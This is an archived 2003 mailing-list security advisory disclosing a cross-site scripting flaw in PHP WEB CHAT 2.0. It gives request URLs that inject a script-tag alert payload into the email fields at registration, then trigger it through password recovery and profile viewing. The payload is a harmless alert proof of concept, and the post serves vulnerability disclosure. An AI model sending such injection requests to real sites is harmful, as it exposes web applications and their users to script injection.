CSS in PHP WEB CHAT

• Previous message: IRM Advisories: "IRM 005: JWalk Application Server Version 3.2c9 Directory Traversal Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Product: PHP WEB CHAT
Version: 2.0
OffSite: http://www.webscriptworld.com
Problem: Cross Site Scripting
--------------------------------------------


Actions:

1)Register
http://[victim]/chat_dir/register.php?register=yes&username=OverG&email=<scr*pt>alert%20("Test!")</scr*pt>&email1=<scr*pt>alert%20("Test!")</scr*pt>

2)To return the lost password and CSS is carried out (email)
http://[victim]/chat_dir/login.php?option=lostpasswd&username=OverG

3)View profile (email1)
http://[victim]/chat_dir/profile.php?username=OverG




Contacts: www.overg.com www.dwcgr0up.com
          irc.zaingandol.org #DWC
          ogprogat_private


Best regards, Over G[DWC Gr0up]


P.S. Sorry for my English :)

• Next message: Martin Schulze: "[SECURITY] [DSA 268-1] New mutt packages fix arbitrary code execution"
• Previous message: IRM Advisories: "IRM 005: JWalk Application Server Version 3.2c9 Directory Traversal Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Mar 25 2003 - 09:14:34 PST